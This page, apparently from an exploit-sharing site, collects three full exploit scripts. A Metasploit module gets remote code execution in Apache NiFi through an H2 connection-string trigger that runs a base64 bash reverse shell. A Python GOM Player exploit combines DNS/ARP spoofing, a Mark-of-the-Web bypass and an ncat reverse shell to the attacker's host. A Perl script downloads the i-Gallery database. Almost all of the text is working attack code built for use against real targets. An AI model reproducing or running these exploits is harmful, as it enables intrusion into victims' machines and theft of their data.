Latest exploits :: CodePwn

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HTTP::Nifi def initialize(info = {}) super( update_info( info, 'Name' => 'Apache NiFi H2 Connection String Remote Code Execution', 'Description' => %q{ The DBCPConnectionPool and HikariCPConnectionPool Controller Services in Apache NiFi 0.0.2 through 1.21.0 allow an authenticated and authorized user to configure a Database URL with the H2 driver that enables custom code execution. This exploit will result in several shells (5-7). Successfully tested against Apache nifi 1.17.0 through 1.21.0. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module 'Matei "Mal" Badanoiu' # discovery ], 'References' => [ ['CVE', '2023-34468'], ['URL', 'https://lists.apache.org/thread/7b82l4f5blmpkfcynf3y6z4x1vqo59h8'], ['URL', 'https://issues.apache.org/jira/browse/NIFI-11653'], ['URL', 'https://nifi.apache.org/security.html#1.22.0'], # not many h2 references on the Internet, especially for nifi, so leaving this here # ['URL', 'https://gist.github.com/ijokarumawak/ed9085024eeeefbca19cfb2f20d23ed4#file-table_record_change_detection_example-xml-L65'] # ['URL', 'http://www.h2database.com/html/features.html'] ], 'DisclosureDate' => '2023-06-12', 'DefaultOptions' => { 'RPORT' => 8443 }, 'Platform' => %w[unix], 'Arch' => [ARCH_CMD], 'Targets' => [ [ 'Unix (In-Memory)', { 'Type' => :unix_memory, 'Payload' => { 'BadChars' => '"' }, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } } ], ], 'Privileged' => false, 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK] } ) ) register_options( [ OptString.new('TARGETURI', [true, 'The base path', '/']), OptInt.new('DELAY', [true, 'The delay (s) before stopping and deleting the processor', 30]) ], self.class ) end def configure_dbconpool # our base64ed payload can't have = in it, so we'll pad out with spaces to remove them b64_pe = ::Base64.strict_encode64(payload.encoded) equals_count = b64_pe.count('=') if equals_count > 0 b64_pe = ::Base64.strict_encode64(payload.encoded + ' ' * equals_count) end if @version > Rex::Version.new('1.16.0') # 1.17.0-1.21.0 driver = '/opt/nifi/nifi-toolkit-current/lib/h2-2.1.214.jar' else # 1.16.0 driver = '/opt/nifi/nifi-toolkit-current/lib/h2-2.1.210.jar' end body = { 'disconnectedNodeAcknowledged' => false, 'component' => { 'id' => @db_con_pool, 'name' => @db_con_pool_name, 'bulletinLevel' => 'WARN', 'comments' => '', 'properties' => { # https://github.com/apache/nifi/pull/7349/files#diff-66ccc94a6b0dfa29817ded9c18e5a87c4fff9cd38eeedc3f121f6436ba53e6c0R38 # we can use a random db name here, the file is created automatically # XXX would mem work too? 'Database Connection URL' => "jdbc:h2:file:/tmp/#{Rex::Text.rand_text_alphanumeric(6..10)}.db;TRACE_LEVEL_SYSTEM_OUT=0\\;CREATE TRIGGER #{Rex::Text.rand_text_alpha_upper(6..12)} BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,#{b64_pe}}|{base64,-d}|{bash,-i}')\n$$--=x", 'Database Driver Class Name' => 'org.h2.Driver', # This seems to be installed by default, do we need the location? 'database-driver-locations' => driver, "Max Total Connections": '1' # prevents us from getting multiple callbacks }, 'sensitiveDynamicPropertyNames' => [] }, 'revision' => { 'clientId' => 'x', 'version' => 0 } } opts = { 'method' => 'PUT', 'uri' => normalize_uri(target_uri.path, 'nifi-api', 'controller-services', @db_con_pool), 'ctype' => 'application/json', 'data' => body.to_json } opts['headers'] = { 'Authorization' => "Bearer #{@token}" } if @token res = send_request_cgi(opts) fail_with(Failure::Unreachable, 'No response received') if res.nil? fail_with(Failure::UnexpectedReply, "Unexpected HTTP response code received #{res.code}") unless res.code == 200 end def configure_processor vprint_status("Configuring processor #{@processor}") body = { # "disconnectedNodeAcknowledged"=> false, 'component' => { 'id' => @processor, 'name' => Rex::Text.rand_text_alphanumeric(6..10), 'bulletinLevel' => 'WARN', 'comments' => '', 'config' => { 'autoTerminatedRelationships' => ['failure', 'success'], 'bulletinLevel' => 'WARN', 'comments' => '', 'concurrentlySchedulableTaskCount' => '1', 'executionNode' => 'ALL', 'penaltyDuration' => '30 sec', 'retriedRelationships' => [], 'schedulingPeriod' => '0 sec', 'schedulingStrategy' => 'TIMER_DRIVEN', 'yieldDuration' => '1 sec', 'state' => 'STOPPED', 'properties' => { 'Database Connection Pooling Service' => @db_con_pool, 'SQL select query' => 'SELECT H2VERSION() FROM DUAL;' # innocious get version query, field required to be non-blank } } }, 'revision' => { 'clientId' => 'x', 'version' => 1 # needs to be 1 since we had 0 before } } opts = { 'method' => 'PUT', 'uri' => normalize_uri(target_uri.path, 'nifi-api', 'processors', @processor), 'ctype' => 'application/json', 'data' => body.to_json } opts['headers'] = { 'Authorization' => "Bearer #{@token}" } if @token res = send_request_cgi(opts) fail_with(Failure::Unreachable, 'No response received') if res.nil? fail_with(Failure::UnexpectedReply, "Unexpected HTTP response code received #{res.code}") unless res.code == 200 end def check # see apache_nifi_processor_rce check method for details on why this is difficult @cleanup_required = false login_type = supports_login? return CheckCode::Unknown('Unable to determine if logins are supported') if login_type.nil? if login_type @version = get_version return CheckCode::Unknown('Unable to determine Apache NiFi version') if @version.nil? if @version <= Rex::Version.new('1.21.0') return CheckCode::Appears("Apache NiFi instance supports logins and vulnerable version detected: #{@version}") end CheckCode::Safe("Apache NiFi instance supports logins but non-vulnerable version detected: #{@version}") else CheckCode::Appears('Apache NiFi instance does not support logins') end end def validate_config if datastore['BEARER-TOKEN'].to_s.empty? && datastore['USERNAME'].to_s.empty? fail_with(Failure::BadConfig, 'Authentication is required. Bearer-Token or Username and Password must be specified') end end def cleanup super return unless @cleanup_required # Wait for thread to execute - This seems necesarry, especially on Windows # and there is no way I can see of checking whether the thread has executed print_status("Waiting #{datastore['DELAY']} seconds before stopping and deleting") sleep(datastore['DELAY']) # Stop Processor stop_processor(@token, @processor) vprint_good("Stopped and terminated processor #{@processor}") # Delete processor delete_processor(@token, @processor, 3) vprint_good("Deleted processor #{@processor}") begin stop_dbconnectionpool(@token, @db_con_pool) rescue DBConnectionPoolError fail_with(Failure::UnexpectedReply, 'Unable to stop DB Connection Pool. Manual cleanup is required') end vprint_good("Disabled db connection pool #{@db_con_pool}, sleeping #{datastore['DELAY']} seconds to allow the connection to finish disabling") sleep(datastore['DELAY']) begin delete_dbconnectionpool(@token, @db_con_pool) rescue DBConnectionPoolError fail_with(Failure::UnexpectedReply, 'Unable to delete DB Connection Pool. Manual cleanup is required') end vprint_good("Deleted db connection pool #{@db_con_pool}") end def exploit # Check whether login is required and set/fetch token if supports_login? validate_config @token = if datastore['BEARER-TOKEN'].to_s.empty? retrieve_login_token else datastore['BEARER-TOKEN'] end fail_with(Failure::NoAccess, 'Invalid Credentials') if @token.nil? else @token = nil end if @version.nil? @version = get_version end # Retrieve root process group @process_group = fetch_root_process_group(@token) fail_with(Failure::UnexpectedReply, 'Unable to retrieve root process group') if @process_group.nil? vprint_good("Retrieved process group: #{@process_group}") @db_con_pool_name = Rex::Text.rand_text_alphanumeric(6..10) begin @db_con_pool = create_dbconnectionpool(@token, @db_con_pool_name, @process_group, @version) rescue DBConnectionPoolError fail_with(Failure::UnexpectedReply, 'Unable to create DB Connection Pool. Manual review of HTTP packets will be required to debug failure.') end @cleanup_required = true # Create processor in root process group @processor = create_processor(@token, @process_group, 'org.apache.nifi.processors.standard.ExecuteSQL') vprint_good("Created processor #{@processor} in process group #{@process_group}") configure_processor vprint_good("Configured processor #{@processor}") configure_dbconpool vprint_good("Configured db connection pool #{@db_con_pool_name} (#{@db_con_pool})") begin start_dbconnectionpool(@token, @db_con_pool) rescue DBConnectionPoolError fail_with(Failure::UnexpectedReply, 'Unable to start DB Connection Pool. Manual review of HTTP packets will be required to debug failure.') end vprint_good('Enabled db connection pool') begin start_processor(@token, @processor) rescue ProcessorError fail_with(Failure::UnexpectedReply, 'Unable to start Processor. Manual review of HTTP packets will be required to debug failure.') end vprint_good('Started processor') end end </code></pre>

<pre><code># Exploit Title: GOM Player 2.3.90.5360 - Remote Code Execution (RCE) # Date: 26.08.2023 # Author: M. Akil Gündoğan # Contact: https://twitter.com/akilgundogan # Vendor Homepage: https://www.gomlab.com/gomplayer-media-player/ # Software Link: https://cdn.gomlab.com/gretech/player/GOMPLAYERGLOBALSETUP_NEW.EXE # Version: 2.3.90.5360 # Tested on: Windows 10 Pro x64 22H2 19045.3324 # PoC Video: https://www.youtube.com/watch?v=8d0YUpdPzp8 # Impacts: GOM player has been downloaded 63,952,102 times according to CNET. It is used by millions of people worldwide. # Vulnerability Description: # The IE component in the GOM Player's interface uses an insecure HTTP connection. Since IE is vulnerable to the # SMB/WebDAV+ "search-ms" technique, we can redirect the victim to the page we created with DNS spoofing and execute code on the target. # In addition, the URL+ZIP+VBS MoTW bypass technique was used to prevent the victim from seeing any warning in the pop-up window. # Full disclosure, developers should be more careful about software security. # Exploit Usage: Run it and enter the IP address of the target. Then specify the port to listen to for the reverse shell. # Some spaghetti and a bad code but it works :) banner = """\033[38;5;196m+-----------------------------------------------------------+ | GOM Player 2.3.90.5360 - Remote Code Execution | | Test edildi, sinifta kaldi. Bu oyun hic bitmeyecek :-) | +-----------------------------------------------------------+\033[0m""" +""" \033[38;5;117m[*]- Author: M. Akil Gundogan - rootkit.com.tr\n\033[0m""" import time,os,zipfile,subprocess,socket,sys print(banner) if os.geteuid() != 0: print("You need root privileges to run the exploit, please use sudo...") sys.exit(1) targetIP = input("- Target IP address: ") listenPort = input("- Listening port for Reverse Shell: ") def fCreate(fileName,fileContent): # File create func. f = open(fileName,"w") f.write(fileContent) f.close() gw = os.popen("ip -4 route show default").read().split() s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.connect((gw[2], 0)) ipaddr = s.getsockname()[0] gateway = gw[2] host = socket.gethostname() print ("- My IP:", ipaddr, " Gateway:", gateway, " Host:", host) print("\n[*]- Stage 1: Downloading neccesary tools...") smbFolderName = "GomUpdater" # change this (optional) expWorkDir = "gomExploitDir" # change this (optional) os.system("mkdir " + expWorkDir +" >/dev/null 2>&1 &") # Creating a working directory for the exploit. time.sleep(1) # It's necessary for exploit stability. os.system("cd " + expWorkDir + "&& mkdir smb-shared web-shared >/dev/null 2>&1 &") # Creating a working directory for the exploit. time.sleep(1) # It's necessary for exploit stability. os.system("cd " + expWorkDir + "/smb-shared && wget https://nmap.org/dist/ncat-portable-5.59BETA1.zip >/dev/null 2>&1 && unzip -o -j ncat-portable-5.59BETA1.zip >/dev/null 2>&1 && rm -rf ncat-portable-5.59BETA1.zip README") #Downloading ncat print(" [*] - Ncat has been downloaded.") subprocess.run("git clone https://github.com/fortra/impacket.git " + expWorkDir + "/impacket >/dev/null 2>&1",shell=True) # Downloading Impacket print(" [*] - Impacket has been downloaded.") subprocess.run("git clone https://github.com/dtrecherel/DNSSpoof.git " + expWorkDir + "/dnsspoof >/dev/null 2>&1",shell=True) # Downloading DNSSpoof.py print(" [*] - DNSSpoof.py has been downloaded.") print("[*]- Stage 2: Creating Attacker SMB Server...") subprocess.Popen("cd " + expWorkDir + /impacket/examples && python3 smbserver.py "+smbFolderName+" ../../smb-shared -smb2support >/dev/null 2>&1",shell=True) # Running SMB server. time.sleep(5) # It's necessary for exploit stability. smbIP = ipaddr spoofUrl = "playinfo.gomlab.com" # Web page that causes vulnerability because it is used as HTTP print("[*]- Stage 3: Creating Attacker Web Page...") # change this (optional) screenExpPage = """ <meta charset="utf-8"> <script> window.alert("GOM Player için acil güncelleme yapılmalı ! Açılan pencerede lütfen updater'a tıklayın.");</script> <script>window.location.href= 'search-ms:displayname=GOM Player Updater&crumb=System.Generic.String%3AUpdater&crumb=location:%5C%5C"""+smbIP+"""'; </script> """ fCreate(expWorkDir + "/web-shared/screen.html",screenExpPage) time.sleep(3) # It's necessary for exploit stability. print("[*]- Stage 4: Creating URL+VBS for MoTW bypass placing it into the ZIP archive...") vbsCommand = '''Set shell=CreateObject("wscript.shell") Shell.Run("xcopy /y \\\\yogurt\\ayran\\ncat.exe %temp%") WScript.Sleep 5000 Shell.Run("cmd /c start /min cmd /c %temp%\\ncat.exe attackerIP attackerPort -e cmd")''' # change this (optional) vbsCommand = vbsCommand.replace("yogurt", smbIP).replace("ayran", smbFolderName).replace("attackerIP",smbIP).replace("attackerPort",listenPort) fCreate(expWorkDir + "/payload.vbs",vbsCommand) urlShortcut = '''[InternetShortcut] URL=file://'''+smbIP+"/"+smbFolderName+'''/archive.zip/payload.vbs IDlist=''' fCreate(expWorkDir + "/smb-shared/Updater.url",urlShortcut) time.sleep(3) # It's necessary for exploit stability. zipName = expWorkDir + "/smb-shared/archive.zip" payload_filename = os.path.join(expWorkDir, "payload.vbs") with zipfile.ZipFile(zipName, "w") as malzip: malzip.write(payload_filename, arcname=os.path.basename(payload_filename)) print("[*]- Stage 5: Running the attacker's web server...") subprocess.Popen("cd " + expWorkDir + "/web-shared && python3 -m http.server 80 >/dev/null 2>&1",shell=True) # Running attacker web server with Python mini http.server time.sleep(3) # It's necessary for exploit stability. print("[*]- Stage 6: Performing DNS and ARP spoofing for the target...") subprocess.Popen("python3 " + expWorkDir + "/dnsspoof/dnsspoof.py -d " + spoofUrl + " -t " + targetIP + ">/dev/null 2>&1",shell=True) # DNS Spoofing... time.sleep(10) # It's neccesary for exploit stability. os.system("ping -c 5 " + targetIP + " >/dev/null 2>&1 &") # Ping the target... os.system("arping -c 5 " + targetIP + " >/dev/null 2>&1 &") # ARPing the target. print("[*]- Stage 7: Waiting for the target to open GOM Player and execute the malicious URL shortcut...\n") subprocess.run("nc -lvnp " + listenPort,shell=True) subprocess.run("pkill -f smbserver.py & pkill -f http.server & pkill -f dnsspoof.py",shell=True) # Closing background processes after exploitation... </code></pre>

<pre><code>==================================================================================================================================== | # Title : i-Gallery v3.4 Database Disclosure Exploit | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) | | # Vendor : http://wmscripti.com/asp-scriptler/igallery-image-resim-galerisi-scripti.html | ==================================================================================================================================== poc : [-] Download the database: The following Perl exploit will attempt to download the (igallery.mdb ) file The (igallery.mdb) It is the database and contains all the data . [+] Dorking İn Google Or Other Search Enggine. [+] save code as perl file : poc.pl [+] code : #!/usr/bin/perl -w # # i-Gallery v3.4 Database Disclosure Exploit # # Author : indoushka # # Vondor : ToastForums.com use LWP::Simple; use LWP::UserAgent; system('cls'); print ('i-Gallery v3.4 Database Disclosure Exploit'); system('color a'); if(@ARGV < 2) { print "[-]How To Use\n\n"; &help; exit(); } sub help() { print "[+] usage1 : perl $0 site.com /path/ \n"; print "[+] usage2 : perl $0 localhost / \n"; } ($TargetIP, $path, $File,) = @ARGV; $File="database/igallery.mdb"; my $url = "http://" . $TargetIP . $path . $File; print "\n Fuck you wait!!! \n\n"; my $useragent = LWP::UserAgent->new(); my $request = $useragent->get($url,":content_file" => "D:/igallery.mdb"); if ($request->is_success) { print "[+] $url Exploited!\n\n"; print "[+] Database saved to D:/igallery.mdb\n"; exit(); } else { print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n"; exit(); } Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | ======================================================================================================================================= </code></pre>